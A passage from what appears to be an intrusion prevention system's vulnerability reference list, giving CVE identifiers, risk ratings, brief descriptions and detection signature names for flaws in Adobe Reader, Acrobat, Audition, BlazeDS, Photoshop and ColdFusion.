Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-PDF_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6970
References:
CVE-2016-6970
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6970
Back to top

Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2941

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-PDF_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2941
References:
CVE-2017-2941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2941
Back to top

Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2960

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-JPEG_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2960
References:
CVE-2017-2960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2960
Back to top

Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2964

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-JPEG_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2964
References:
CVE-2017-2964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2964
Back to top

Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2965

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-Binary_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2965
References:
CVE-2017-2965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2965
Back to top

Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6957

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-PDF_Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6957
References:
CVE-2016-6957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6957
Back to top

Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6958

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-PDF_Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6958
References:
CVE-2016-6958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6958
Back to top

Adobe-Acrobat-Reader-Shell-Metacharacter-Code-Execution

About this vulnerability: A vulnerability in Adobe Acrobat Reader for Unix
Risk: Moderate
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Adobe Reader
Type: Metacharacter
Description: There is a vulnerability in the way Adobe Acrobat Reader validates a filename within the uudecode function. A specially crafted filename can allow an attacker to execute arbitrary programs with the privileges of the user that opened the malicious PDF document.
Situation: E-Mail_BS-Adobe-Acrobat-Reader-Shell-Metacharacter-Code-Execution
File-TextId_Adobe-Acrobat-Reader-Shell-Metacharacter-Code-Execution
References:
CVE-2004-0630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0630
BID-10931
http://www.securityfocus.com/bid/10931
Back to top

Adobe-Acrobat-Reader-Stack-Overflow-CVE-2017-2948

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-PDF_Adobe-Acrobat-Reader-Stack-Overflow-CVE-2017-2948
References:
CVE-2017-2948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2948
Back to top

Adobe-Acrobat-Reader-Toolbutton-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Acrobat Reader
Risk: High
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader; Adobe Acrobat
Type: Malfunction
Description: A use after free vulnerability exists in Adobe Acrobat and Reader. The vulnerability is due to an error in the handling of callback functions associated with ToolButton objects. A remote attacker can exploit this vulnerability by enticing the user to open a specially crafted file. Successful exploitation could result in arbitrary code execution in the context of the currently affected user.
Situation: File-PDF_Adobe-Acrobat-Reader-Toolbutton-Use-After-Free
References:
CVE-2013-3346
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3346
BID-62149
http://www.securityfocus.com/bid/62149
OSVDB-96745
http://www.osvdb.org/96745
Back to top

Adobe-Acrobat-Reader-Type-Confusion-CVE-2017-2962

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-PDF_Adobe-Acrobat-Reader-Type-Confusion-CVE-2017-2962
References:
CVE-2017-2962
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2962
Back to top

Adobe-Acrobat-Reader-U3D-CLODMeshContinuation-Code-Execution

About this vulnerability: A vulnerability in Adobe Reader
Risk: High
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: An invalid array index vulnerability exists in Adobe Acrobat Reader that can allow arbitrary code execution.
Situation: HTTP_SS-Adobe-Acrobat-Reader-U3D-CLODMeshContinuation-Code-Execution
File-PDF_Adobe-Acrobat-Reader-U3D-CLODMeshContinuation-Code-Execution
References:
CVE-2009-2990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2990
BID-36671
http://www.securityfocus.com/bid/36671
Back to top

Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Adobe Acrobat Reader and Acrobat Professional products
Risk: High
First detected in: sgpkg-ips-263-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: There is a memory corruption vulnerability in Adobe Acrobat Reader and Acrobat Professional products. A remote attacker can exploit this vulnerability by enticing a target user to open malformed PDF files.
Situation: E-Mail_BS-Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption
HTTP_SS-Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption
File-PDF_Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption
References:
CVE-2009-2994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2994
BID-36638
http://www.securityfocus.com/bid/36638
OSVDB-58912
http://www.osvdb.org/58912
Back to top

Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6944

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6944
References:
CVE-2016-6944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6944
Back to top

Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6945

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6945
References:
CVE-2016-6945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6945
Back to top

Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2955

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2955
References:
CVE-2017-2955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2955
Back to top

Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2956

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2956
References:
CVE-2017-2956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2956
Back to top

Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2961

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2961
References:
CVE-2017-2961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2961
Back to top

Adobe-Acrobat-Reader-Xfa-Formcalc-Replace-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat DC
Risk: High
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Integer Overflow
Description: A vulnerability in Adobe Acrobat Reader which allows remote attackers to execute arbitrary code, due to improper validation of the parameters for XFA FormCalc replace function.
Situation: File-PDF_Adobe-Acrobat-Reader-Xfa-Formcalc-Replace-Integer-Overflow
References:
CVE-2016-1043
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1043
Back to top

Adobe-Acrobat-XPS-Font-Parsing-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper parsing of fonts embedded in XPS files causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit allows an attacker to gain acces to information relevant to further exploitation.
Situation: File-Binary_Adobe-Acrobat-XPS-Font-Parsing-Out-Of-Bounds-Read
References:
CVE-2018-5014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5014
Back to top

Adobe-Acrobat-XPS-Initial-Page-Processing-Format-String-Vulnerability

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Format String
Description: Improper parsing of elements in an XPS document causes a format string vulnerability in Adobe Acrobat. A successful exploit may allow information to be disclosed to a remote attacker.
Situation: File-Text_Adobe-Acrobat-XPS-Initial-Page-Processing-Format-String-Vulnerability
References:
CVE-2018-4899
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4899
Back to top

Adobe-Acrobat-XPS-JPEG-App2-Parsing-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1025-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Buffer Overflow
Description: There has been reported a heap-based buffer overflow vulnerability in the XPS component of Adobe Acrobat. This vulnerability could be exploited by enticing a target user into opening a crafted XPS document, which could result in arbitrary code execution.
Situation: File-JPEG_Adobe-Acrobat-XPS-JPEG-App2-Parsing-Heap-Based-Buffer-Overflow
References:
CVE-2017-16383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16383
Back to top

Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper parsing of JPEGs in XPS documents causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit allows information to be disclosed.
Situation: File-JPEG_Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read
References:
CVE-2017-16418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16418
Back to top

Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read-CVE-2018-4889

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper parsing of records in a JPEG file embedded in an XPS document causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit may lead to an information disclosure.
Situation: File-JPEG_Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read-CVE-2018-4889
References:
CVE-2018-4889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4889
Back to top

Adobe-Acrobat-XPS-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-977-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper handling of embedded JPEG files in XPS files causes an out of bounds read in Adobe Acrobat. A successful exploit can result in information disclosure.
Situation: File-JPEG_Adobe-Acrobat-XPS-Out-Of-Bounds-Read
References:
CVE-2017-11209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11209
Back to top

Adobe-Acrobat-XPS-Path-Element-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper parsing of path elements in an XPS file causes an out-of-bounds write vulnerability in Adobe Acrobat. A successful exploit allows an attacker to execute arbitrary code on the target system with the privileges of the Acrobat process.
Situation: File-TextId_Adobe-Acrobat-XPS-Path-Element-Out-Of-Bounds-Write
References:
CVE-2018-4898
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4898
Back to top

Adobe-Acrobat-XPS-Processing-Format-String

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1091-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Format String
Description: Improper parsing of XPS documents causes a format string vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to run code on the target system.
Situation: File-Text_Adobe-Acrobat-XPS-Processing-Format-String
References:
CVE-2018-5056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5056
Back to top

Adobe-Acropdf-ActiveX-Control-Memory-Corruption

About this vulnerability: A vulnerability in Adobe Acrobat Professional
Risk: High
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Acrobat
Type: Malfunction
Description: A memory corruption vulnerability exists in the Adobe AcroPDF ActiveX control. The flaw is due by improper handling of arguments passed to certain methods and properties exposed by the control. By enticing a user to open a malicious HTML page, an attacker may inject and execute arbitrary code on the target host. In an attack case where code injection is not successful, the application which uses the affected product will terminate abnormally. It is reported that a more sophisticated attack can result in code injection, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.
Situation: HTTP_SS-Adobe-Acropdf-ActiveX-Control-Memory-Corruption
File-Text_Adobe-Acropdf-ActiveX-Control-Memory-Corruption
References:
CVE-2006-6027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6027
BID-21155
http://www.securityfocus.com/bid/21155
Back to top

Adobe-Audition-Session-File-Stack-Buffer-Overflow

About this vulnerability: An attempt to exploit a vulnerability in Adobe Audition
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Audition
Type: Buffer Overflow
Description: A code execution vulnerability exists in Adobe Audition. The vulnerability is due to a stack buffer overflow while parsing Audition Session (.ses) files.
Situation: HTTP_SS-Adobe-Audition-Session-File-Stack-Buffer-Overflow
File-Binary_Adobe-Audition-Session-File-Stack-Buffer-Overflow
References:
CVE-2011-0614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0614
BID-47841
http://www.securityfocus.com/bid/47841
OSVDB-72326
http://www.osvdb.org/72326
Back to top

Adobe-Audition-Session-File-TRKM-Stack-Buffer-Overflow

About this vulnerability: An attempt to exploit a vulnerability in Adobe Audition
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Audition
Type: Buffer Overflow
Description: A code execution vulnerability has been identified in Adobe Audition. The vulnerability is due to insufficient validation of Audition Session (.ses) files.
Situation: HTTP_SS-Adobe-Audition-Session-File-TRKM-Stack-Buffer-Overflow
File-Binary_Adobe-Audition-Session-File-TRKM-Stack-Buffer-Overflow
References:
CVE-2011-0615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0615
BID-47838
http://www.securityfocus.com/bid/47838
OSVDB-72327
http://www.osvdb.org/72327
Back to top

Adobe-authplay.dll-Code-Execution-CVE-2010-1297

About this vulnerability: Code execution vulnerability in multiple Adobe products
Risk: Critical
First detected in: sgpkg-ips-311-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Adobe Reader; Adobe Flash Player; Adobe Acrobat
Type: Malfunction
Description: There is a code execution vulnerability in multiple Adobe products. By persuading a target user to open a malicious PDF file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: E-Mail_BS-Adobe-authplay.dll-CVE-2010-1297-Exploit
HTTP_SS-Adobe-authplay.dll-CVE-2010-1297-Exploit
HTTP_SS-Adobe-authplay.dll-CVE-2010-1297-Exploit-2
File-Flash_Adobe-authplay.dll-CVE-2010-1297-Exploit-2
File-PDF_Adobe-authplay.dll-CVE-2010-1297-Exploit
References:
CVE-2010-1297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297
BID-40586
http://www.securityfocus.com/bid/40586
OSVDB-65141
http://www.osvdb.org/65141
Back to top

Adobe-BlazeDS-XML-External-Entity-Injection

About this vulnerability: An Adobe BlazeDS XML External Entity Injection vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-764-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe BlazeDS
Type: Input Validation
Description: A vulnerability in Adobe BlazeDS, versions 3.2 and earlier, effecting multiple Adobe products, which allows remote attackers to obtain sensitive information via an XML External Entity injection.
Situation: HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities
References:
CVE-2009-3960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3960
BID-38197
http://www.securityfocus.com/bid/38197
OSVDB-62292
http://www.osvdb.org/62292
Back to top

Adobe-Camera-Raw-Plugin-TIFF-Image-Processing-Buffer-Underflow

About this vulnerability: A vulnerability in Adobe Systems Adobe Camera Raw Plug-In
Risk: Moderate
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Photoshop
Type: Buffer Overflow
Description: A buffer underflow vulnerability has been reported in Adobe Photoshop. The vulnerability is due to an error while parsing LZW data inside TIFF files with the raw plug-in. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to process a maliciously crafted file. This can lead to code execution in the context of the affected user.
Situation: File-Binary_Adobe-Camera-Raw-Plugin-TIFF-Image-Processing-Buffer-Underflow
References:
CVE-2012-5679
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5679
Back to top

Adobe-ColdFusion-Application-Server-CVE-2022-38418-Directory-Traversal

About this vulnerability: A vulnerability in Adobe ColdFusion.
Risk: High
First detected in: sgpkg-ips-1559-5242
Last changed: sgpkg-ips-1559-5242
Platform: Linux; Windows; Mac OS
Software: Adobe ColdFusion
Type: Directory Traversal
Description: A vulnerability in Adobe ColdFusion, versions 2018 prior to Update 15 and 2021 prior to Update 5, which allows remote attackers to execute arbitrary code in the security context of SYSTEM on the server due to an input validation flaw when processing requests sent to the Application Server.
Situation: HTTP_CRL-Adobe-ColdFusion-Application-Server-CVE-2022-38418-Directory-Traversal
References:
CVE-2022-38418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38418
Back to top

Adobe-ColdFusion-Application-Server-CVE-2022-38421-Directory-Traversal

About this vulnerability: A vulnerability in Adobe ColdFusion.
Risk: High
First detected in: sgpkg-ips-1557-5242
Last changed: sgpkg-ips-1557-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Input Validation
Description: A vulnerability in Adobe ColdFusion, versions 2018 prior to Update 15 and 2021 prior to Update 5, which allows remote attackers to execute arbitrary code in the security context of SYSTEM on the server via the attributes.source parameter, due to an input validation flaw when processing requests sent to the Application Server.
Situation: HTTP_CRL-Adobe-ColdFusion-Application-Server-CVE-2022-38421-Directory-Traversal
References:
CVE-2022-38421
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38421
Back to top

Adobe-ColdFusion-Application-Server-CVE-2023-26361-Directory-Traversal

About this vulnerability: A vulnerability in Adobe Systems ColdFusion
Risk: Moderate
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Input Validation
Description: An information disclosure exists in Adobe ColdFusion. This vulnerability is due to input validation flaw when processing request sent to the Application Server. A remote attacker could exploit these vulnerabilities by sending crafted requests to the target server. Successful exploitation could result in information disclosure with SYSTEM privileges.
Situation: HTTP_CRL-Adobe-ColdFusion-Application-Server-CVE-2023-26361-Directory-Traversal
References:
CVE-2023-26361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26361
Back to top

Adobe-ColdFusion-Authentication-Misconfiguration

About this vulnerability: A vulnerability in Adobe ColdFusion administrator.cfc
Risk: High
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Adobe ColdFusion
Type: Misconfiguration
Description: A vulnerability in Adobe Coldfusion administrator.cfc which allows remote attackers to bypass authentication and possibly execure arbitrary code, by logging in to the RDS component using the empty password and possibly accessing the administrative web interface.
Situation: HTTP_CRL-Adobe-ColdFusion-Authentication-Misconfiguration
References:
CVE-2013-0632
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0632
BID-57330
http://www.securityfocus.com/bid/57330
Back to top

Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Adobe Systems ColdFusion
Risk: Moderate
First detected in: sgpkg-ips-1169-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Malfunction
Description: There has been reported an unrestricted file upload vulnerability in Adobe ColdFusion. This vulnerability could be exploited by a remote attacker. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CS-Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload
References:
CVE-2019-7816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7816
Back to top

Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload-Second

About this vulnerability: A vulnerability in Adobe Systems ColdFusion
Risk: High
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Malfunction
Description: An unrestricted file upload vulnerability has been reported in Adobe ColdFusion. The vulnerability is due to improper restrictions on files uploaded by users. A remote, unauthenticated attacker can exploit this vulnerability by uploading a malicious file to the target server. Successful exploitation would lead to execution of arbitrary code in the security context of SYSTEM or root on the server.
Situation: HTTP_CS-Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload-Second
References:
CVE-2019-7838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7838
Back to top

Adobe-ColdFusion-Ckeditor-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Adobe ColdFusion
Risk: High
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Misconfiguration
Description: A vulnerability in Adobe ColdFusion CKEditor, versions 11 (Update 14 and earlier), 2016 (Update 6 and earlier), and 2018 (July 12 release), which allows remote attackers to upload and execute JSP files through the filemanager upload plugin.
Situation: HTTP_CS-Adobe-ColdFusion-Ckeditor-Upload-Unrestricted-File-Upload
References:
CVE-2018-15961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15961
Back to top

Adobe-ColdFusion-Ckeditor-Upload-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Adobe Systems ColdFusion
Risk: Moderate
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Malfunction
Description: Improper upload restrictions cause an unrestricted file upload vulnerability in Adobe ColdFusion. A successful exploit allows an attacker to upload files that will be executed, allowing arbitrary code execution on the target system.
Situation: HTTP_CS-Adobe-ColdFusion-Ckeditor-Upload-Unrestricted-File-Upload
References:
CVE-2018-15961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15961
Back to top

Adobe-ColdFusion-Ckeditor-Upload.cfm-Directory-Traversal

About this vulnerability: A vulnerability in Adobe Systems ColdFusion
Risk: Moderate
First detected in: sgpkg-ips-1118-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Malfunction
Description: Improper path sanitization causes a directory traversal vulnerability in Adobe ColdFusion. A successful exploit allows an attacker to upload files to arbitrary locations on the target system.
Situation: HTTP_CS-Adobe-ColdFusion-Ckeditor-Upload.cfm-Directory-Traversal
References:
CVE-2018-15960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15960
Back to top

Adobe-ColdFusion-CVE-2019-7839-Remote-Code-Execution

About this vulnerability: A vulnerability in Adobe Systems ColdFusion
Risk: Moderate
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Malfunction
Description: There has been reported a remote code execution vulnerability in Adobe ColdFusion. This vulnerability could be exploited by a remote attacker. Successful exploitation can lead in arbitrary code execution.
Situation: Generic_CS-Adobe-ColdFusion-CVE-2019-7839-Remote-Code-Execution
References:
CVE-2019-7839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7839
Back to top

Adobe-ColdFusion-CVE-2022-35690-ODBC-Agent-Memory-Corruption

About this vulnerability: A vulnerability in Adobe ColdFusion.
Risk: High
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1582-5242
Platform: Windows; Linux
Software: Adobe ColdFusion
Type: Buffer Overflow
Description: A vulnerability in Adobe ColdFusion, versions 2018 prior to Update 15 and 2021 prior to Update 5, which allows remote attackers to execute arbitrary code by sending a maliciously crafted request to a target service, due the lack of proper validation of user-supplied data, which can result in a memory corruption condition. This detection also covers CVE-2022-35710 and CVE-2022-35711 which use port 20010 instead of 20009.
Situation: Generic_CS-Adobe-ColdFusion-CVE-2022-35690-ODBC-Agent-Memory-Corruption
References:
CVE-2022-35690
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35690
Back to top

Adobe-ColdFusion-CVE-2023-38204-Insecure-Deserialization

About this vulnerability: A vulnerability in Adobe ColdFusion
Risk: High
First detected in: sgpkg-ips-1623-5242
Last changed: sgpkg-ips-1623-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Input Validation
Description: An insecure deserialization vulnerability exists in Adobe ColdFusion. The vulnerability is due to deserialization of untrusted data when processing HTTP parameters sent to ColdFusion Component (CFC) endpoints. A remote, unauthenticated, attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution in the security context of SYSTEM.
Situation: HTTP_CRL-Adobe-ColdFusion-CVE-2023-38204-Insecure-Deserialization
References:
CVE-2023-38204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38204
Back to top

Adobe-ColdFusion-Dataservicescfproxy-Commons-Beanutils-Insecure-Deserialization

About this vulnerability: A vulnerability in Adobe Systems ColdFusion (2016 release)
Risk: Moderate
First detected in: sgpkg-ips-1107-5242
Last changed: sgpkg-ips-1296-5242
